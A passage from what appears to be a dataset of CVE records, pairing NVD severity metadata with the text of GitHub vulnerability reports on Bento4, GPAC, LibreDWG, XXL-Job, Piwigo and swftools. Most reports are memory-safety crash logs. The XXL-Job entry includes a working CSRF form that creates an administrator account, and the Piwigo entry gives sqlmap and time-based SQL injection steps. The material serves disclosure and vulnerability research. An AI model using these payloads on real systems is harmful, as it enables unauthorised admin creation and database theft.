fps ./poc ``` - Asan ``` ➜ build git:(master) ✗ ./mp42hls --encryption-iv-mode fps ./poc AddressSanitizer:DEADLYSIGNAL ================================================================= ==15594==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fd9e20834e5 bp 0x7ffe2c690150 sp 0x7ffe2c68f8c8 T0) ==15594==The signal is caused by a READ memory access. ==15594==Hint: address points to the zero page. #0 0x7fd9e20834e4 (/lib/x86_64-linux-gnu/libc.so.6+0x18b4e4) #1 0x7fd9e249c8fb (/lib/x86_64-linux-gnu/libasan.so.5+0x678fb) #2 0x557f40b2b5f3 in main /home/lin/Bento4/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:1853 #3 0x7fd9e1f1f0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #4 0x557f40b1f96d in _start (/home/lin/Bento4/build/mp42hls+0x32b96d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x18b4e4) ==15594==ABORTING ``` poc: [poc.zip](https://github.com/axiomatic-systems/Bento4/files/8459235/poc.zip) Thanks !!
AddressSanitizer: SEGV /build/glibc-sMfBJT/glibc-2.31/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65
https://api.github.com/repos/axiomatic-systems/Bento4/issues/691/comments
1
2022-04-10T14:50:23Z
2022-05-17T06:24:00Z
https://github.com/axiomatic-systems/Bento4/issues/691
1,199,061,348
691
CVE-2022-30976
2022-05-18T11:15:15.460
GPAC 2.0.0 misuses a certain Unicode utf8_wcslen (renamed gf_utf8_wcslen) function in utils/utf.c, resulting in a heap-based buffer over-read, as demonstrated by MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 4.9, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/blob/105d67985ff3c3f4b98a98f312e3d84ae77a4463/share/doc/man/gpac.1#L2226-L2229" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/blob/105d67985ff3c3f4b98a98f312e3d84ae77a4463/src/utils/utf.c#L35-L59" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2179" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7AEE044-50E9-4230-B492-A5FF18653115", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2179
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ ## Describe the bug There is a heap-overflow bug in gf_utf8_wcslen, utils/utf.c:442, can be triggered via MP4Box+ ASan ## Step to reproduce ./configure --enable-sanitizer && make -j$(nproc) ./MP4Box -diso poc ## Sanitizer output ``` [isom] invalid tag size in Xtra ! [isom] not enough bytes in box Xtra: 4 left, reading 8 (file isomedia/box_code_base.c, line 12849), skipping box [iso file] Box "Xtra" (start 24) has 4 extra bytes [iso file] Read Box type 00000001 (0x00000001) at position 92 has size 0 but is not at root/file level. Forbidden, skipping end of parent box ! [iso file] Box "moof" (start 84) has 8 extra bytes [iso file] Movie fragment but no moov (yet) - possibly broken parsing! [iso file] Box "vwid" (start 204) has 5 extra bytes [iso file] Unknown top-level box type 00000B01 [iso file] Incomplete box 00000B01 - start 264 size 34164724 [iso file] Incomplete file while reading for dump - aborting parsing ================================================================= ==2183542==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000011d6 at pc 0x7f95a4f4ec68 bp 0x7ffdfa692370 sp 0x7ffdfa692360 READ of size 2 at 0x6020000011d6 thread T0 #0 0x7f95a4f4ec67 in gf_utf8_wcslen utils/utf.c:442 #1 0x7f95a4f4ec67 in gf_utf8_wcslen utils/utf.c:438 #2 0x7f95a542a073 in xtra_box_dump isomedia/box_dump.c:6471 #3 0x7f95a543161d in gf_isom_box_dump isomedia/box_funcs.c:2108 #4 0x7f95a53f7dd9 in gf_isom_dump isomedia/box_dump.c:138 #5 0x55aea7254fbc in dump_isom_xml /home/hzheng/real-validate/gpac/applications/mp4box/filedump.c:2053 #6 0x55aea7239707 in mp4boxMain /home/hzheng/real-validate/gpac/applications/mp4box/main.c:6177 #7 0x7f95a2a160b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #8 0x55aea7215aed in _start (/home/hzheng/real-validate/gpac/bin/gcc/MP4Box+0xa9aed) 0x6020000011d6 is located 0 bytes to the right of 6-byte region [0x6020000011d0,0x6020000011d6) allocated by thread T0 here: #0 0x7f95a8767bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8) #1 0x7f95a53dc17b in xtra_box_read isomedia/box_code_base.c:12875 #2 0x7f95a542d3c3 in gf_isom_box_read isomedia/box_funcs.c:1860 #3 0x7f95a542d3c3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #4 0x7f95a542e815 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #5 0x7f95a545789c in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:373 #6 0x7f95a545da0f in gf_isom_parse_movie_boxes isomedia/isom_intern.c:860 #7 0x7f95a545da0f in gf_isom_open_file isomedia/isom_intern.c:980 #8 0x55aea723f1ed in mp4boxMain /home/hzheng/real-validate/gpac/applications/mp4box/main.c:5990 #9 0x7f95a2a160b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow utils/utf.c:442 in gf_utf8_wcslen Shadow bytes around the buggy address: 0x0c047fff81e0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff81f0: fa fa 00 07 fa fa 07 fa fa fa fd fa fa fa 04 fa 0x0c047fff8200: fa fa 00 02 fa fa fd fa fa fa 00 07 fa fa 00 00 0x0c047fff8210: fa fa 00 00 fa fa 00 fa fa fa fd fa fa fa 00 04 0x0c047fff8220: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 01 fa =>0x0c047fff8230: fa fa 06 fa fa fa 01 fa fa fa[06]fa fa fa 00 00 0x0c047fff8240: fa fa fd fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2183542==ABORTING ``` ## version system: ubuntu 20.04.3 LTS compiler: gcc 9.3.0 gpac version: latest commit https://github.com/gpac/gpac/commit/a4015fa4fc99fd3e7a62be0fe6bd565e1dded030 ## Credit Han Zheng [NCNIPC of China](http://www.nipc.org.cn) [Hexhive](http://hexhive.epfl.ch/) ## POC [POC.zip](https://github.com/gpac/gpac/files/8555402/POC.zip)
[BUG] heap buffer overflow in gf_utf8_wcslen, utils/utf.c:442
https://api.github.com/repos/gpac/gpac/issues/2179/comments
4
2022-04-25T14:26:20Z
2023-03-07T12:37:47Z
https://github.com/gpac/gpac/issues/2179
1,214,594,854
2,179
CVE-2021-42585
2022-05-23T11:16:10.547
A heap buffer overflow was discovered in copy_compressed_bytes in decode_r2007.c in dwgread before 0.12.4 via a crafted dwg file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/351" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "030087DE-C04A-4AA0-864A-FD276745EB75", "versionEndExcluding": "0.12.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/351
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
## Affected version [the latest commit](https://github.com/LibreDWG/libredwg/commit/4c210bbae04957b7d4aba55aee8dca42337f8d47) and 0.12.4 ## What's the problem? A heap buffer overflow was discovered in copy_compressed_bytes in decode_r2007.c:332. ASAN report: ``` ./dwgread ./tests_64205 ERROR: Section[7]->pages[0] overflow Warning: Failed to find section_info[1] ERROR: Failed to read header section Warning: Failed to find section_info[3] ERROR: Failed to read class section Warning: Failed to find section_info[7] ERROR: Failed to read objects section Warning: Failed to find section_info[2] Warning: thumbnail.size mismatch: 185216 != 163880 ERROR: Failed to find page 222 ================================================================= ==9485==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000002e3 at pc 0x000000ca5f2b bp 0x7ffdbc6926d0 sp 0x7ffdbc6926c8 WRITE of size 8 at 0x6020000002e3 thread T0 #0 0xca5f2a in memcpy /usr/include/x86_64-linux-gnu/bits/string3.h:53:10 #1 0xca5f2a in copy_compressed_bytes /root/fuzz/libredwg/src/decode_r2007.c:332:7 #2 0xca4195 in decompress_r2007 /root/fuzz/libredwg/src/decode_r2007.c:523:7 #3 0xcaa7fe in read_data_page /root/fuzz/libredwg/src/decode_r2007.c:728:13 #4 0xcaa319 in read_data_section /root/fuzz/libredwg/src/decode_r2007.c:811:19 #5 0xc9be6b in read_2007_section_revhistory /root/fuzz/libredwg/src/decode_r2007.c:1945:11 #6 0xc83d65 in read_r2007_meta_data /root/fuzz/libredwg/src/decode_r2007.c:2387:12 #7 0x4f9fcc in decode_R2007 /root/fuzz/libredwg/src/decode.c:3836:11 #8 0x4e49ab in dwg_decode /root/fuzz/libredwg/src/decode.c:248:29 #9 0x4c75cc in dwg_read_file /root/fuzz/libredwg/src/dwg.c:254:11 #10 0x4c5d47 in main /root/fuzz/libredwg/programs/dwgread.c #11 0x7f581684583f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #12 0x41ba58 in _start (/root/fuzz/pocs/dwgread+0x41ba58) 0x6020000002e3 is located 3 bytes to the right of 16-byte region [0x6020000002d0,0x6020000002e0) allocated by thread T0 here: #0 0x495a22 in calloc (/root/fuzz/pocs/dwgread+0x495a22) #1 0xca9e98 in read_data_section /root/fuzz/libredwg/src/decode_r2007.c:774:26 SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/include/x86_64-linux-gnu/bits/string3.h:53:10 in memcpy Shadow bytes around the buggy address: 0x0c047fff8000: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff8010: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 06 fa 0x0c047fff8020: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa 04 fa 0x0c047fff8030: fa fa 04 fa fa fa 00 06 fa fa 04 fa fa fa 04 fa 0x0c047fff8040: fa fa 00 00 fa fa 00 00 fa fa 02 fa fa fa 02 fa =>0x0c047fff8050: fa fa 02 fa fa fa 02 fa fa fa 00 00[fa]fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==9485==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64205.zip dwgread ./tests_64205 ``` POC file : [tests_64205.zip](https://github.com/LibreDWG/libredwg/files/6606900/tests_64205.zip)
Heap-buffer-overflow in copy_compressed_bytes in decode_r2007.c:332
https://api.github.com/repos/LibreDWG/libredwg/issues/351/comments
1
2021-06-07T07:50:57Z
2021-06-07T19:17:53Z
https://github.com/LibreDWG/libredwg/issues/351
913,238,141
351
CVE-2021-42586
2022-05-23T11:16:10.600
A heap buffer overflow was discovered in copy_bytes in decode_r2007.c in dwgread before 0.12.4 via a crafted dwg file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/350" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "030087DE-C04A-4AA0-864A-FD276745EB75", "versionEndExcluding": "0.12.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/350
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
## Affected version [the latest commit](https://github.com/LibreDWG/libredwg/commit/4c210bbae04957b7d4aba55aee8dca42337f8d47) and 0.12.4 ## What's the problem? A heap buffer overflow was discovered in copy_bytes in decode_r2007.c:228. ASAN report: ``` ./dwgread ./tests_64199 ================================================================= ==9330==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a000005f55 at pc 0x000000ca93c3 bp 0x7ffe5a6134c0 sp 0x7ffe5a6134b8 WRITE of size 1 at 0x62a000005f55 thread T0 #0 0xca93c2 in copy_bytes /root/fuzz/libredwg/src/decode_r2007.c:228:12 #1 0xca431a in decompress_r2007 /root/fuzz/libredwg/src/decode_r2007.c:550:11 #2 0xcaa7fe in read_data_page /root/fuzz/libredwg/src/decode_r2007.c:728:13 #3 0xcaa319 in read_data_section /root/fuzz/libredwg/src/decode_r2007.c:811:19 #4 0xc8bee9 in read_2007_section_handles /root/fuzz/libredwg/src/decode_r2007.c:1622:11 #5 0xc83c84 in read_r2007_meta_data /root/fuzz/libredwg/src/decode_r2007.c:2378:12 #6 0x4f9fcc in decode_R2007 /root/fuzz/libredwg/src/decode.c:3836:11 #7 0x4e49ab in dwg_decode /root/fuzz/libredwg/src/decode.c:248:29 #8 0x4c75cc in dwg_read_file /root/fuzz/libredwg/src/dwg.c:254:11 #9 0x4c5d47 in main /root/fuzz/libredwg/programs/dwgread.c #10 0x7f7541c7483f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #11 0x41ba58 in _start (/root/fuzz/pocs/dwgread+0x41ba58) 0x62a000005f55 is located 0 bytes to the right of 23893-byte region [0x62a000000200,0x62a000005f55) allocated by thread T0 here: #0 0x495a22 in calloc (/root/fuzz/pocs/dwgread+0x495a22) #1 0xca9e98 in read_data_section /root/fuzz/libredwg/src/decode_r2007.c:774:26 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/fuzz/libredwg/src/decode_r2007.c:228:12 in copy_bytes Shadow bytes around the buggy address: 0x0c547fff8b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c547fff8be0: 00 00 00 00 00 00 00 00 00 00[05]fa fa fa fa fa 0x0c547fff8bf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==9330==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64199.zip dwgread ./tests_64199 ``` POC file : [tests_64199.zip](https://github.com/LibreDWG/libredwg/files/6606871/tests_64199.zip)
Heap-buffer-overflow in copy_bytes in decode_r2007.c:228
https://api.github.com/repos/LibreDWG/libredwg/issues/350/comments
1
2021-06-07T07:46:30Z
2021-06-07T18:57:04Z
https://github.com/LibreDWG/libredwg/issues/350
913,233,568
350
CVE-2022-29002
2022-05-23T21:16:04.963
A Cross-Site Request Forgery (CSRF) in XXL-Job v2.3.0 allows attackers to arbitrarily create administrator accounts via the component /gaia-job-admin/user/add.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/2821" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "233AAF33-91ED-425F-951A-1DAAC0B3A4C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/xuxueli/xxl-job/issues/2821
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xuxueli", "xxl-job" ]
/gaia-job-admin/user/add is an interface for adding users and giving users permissions. This interface has CSRF vulnerability POC: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://7.186.23.6:8080/xxl-job-admin/user/add" method="POST"> <input type="hidden" name="username" value="h00279311" /> <input type="hidden" name="password" value="123456" /> <input type="hidden" name="role" value="1" /> <input type="hidden" name="permission" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> After clicking, the administrator role has been added ![record](https://user-images.githubusercontent.com/12929214/162417405-fefe6ae7-31a7-48b2-9b3a-a5711d099ae3.PNG)
xxl-job-admin v2.3.0 has a CSRF vulnerability, which can be used to create an administrator account、Modify password, perform task scheduling and other operations
https://api.github.com/repos/xuxueli/xxl-job/issues/2821/comments
0
2022-04-08T10:02:07Z
2022-04-08T10:24:04Z
https://github.com/xuxueli/xxl-job/issues/2821
1,197,113,705
2,821
CVE-2021-40317
2022-05-26T13:15:08.083
Piwigo 11.5.0 is affected by a SQL injection vulnerability via admin.php and the id parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1470" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:11.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "B6BC6DF8-D938-4413-B4C7-132BCC938E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1470
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
The following is the detail about this vulnerability I found in Piwigo 11.5.0: First, visit URL/admin.php and login, then click Album-Move. On this page, click ORDER on the right side. ![1](https://user-images.githubusercontent.com/67731575/131251900-dd25e4e2-473c-41d0-b574-e037a0fd1711.png) Then we can see: ![2](https://user-images.githubusercontent.com/67731575/131251975-d4128249-3e35-40f0-a79d-79ca256f4b53.png) Select default, use Burpsuite during clicking APPLY. ![3](https://user-images.githubusercontent.com/67731575/131252161-420a5a52-23dd-4dc4-934d-dd4bd58db1aa.png) Then in sqlmap: python sqlmap.py -r post.txt -o --dbms=MySQL ![6](https://user-images.githubusercontent.com/67731575/131252197-b8d80c1a-16ff-4769-a668-0880816bc0f7.png) See admin\cat_move.php: ![8](https://user-images.githubusercontent.com/67731575/131252300-241ddce4-1931-493b-8ecb-aec14207e6a4.png) Here there seems to be no confirmation of the legitimacy of the parameter $_POST[id]. And other parameters are legal so query is done. Here is the manual injection test: (Load successfully after sleeping 5 seconds) ![4](https://user-images.githubusercontent.com/67731575/131252627-a980c52d-fd13-4bb3-8009-296b34c005e2.png) Thanks for reading!
[11.5.0]SQL Injection Vulnerability
https://api.github.com/repos/Piwigo/Piwigo/issues/1470/comments
1
2021-08-29T13:49:36Z
2022-09-28T13:26:54Z
https://github.com/Piwigo/Piwigo/issues/1470
982,104,453
1,470
CVE-2021-42195
2022-06-02T14:15:29.733
An issue was discovered in swftools through 20201222. A heap-buffer-overflow exists in the function handleEditText() located in swfdump.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/174" } ]
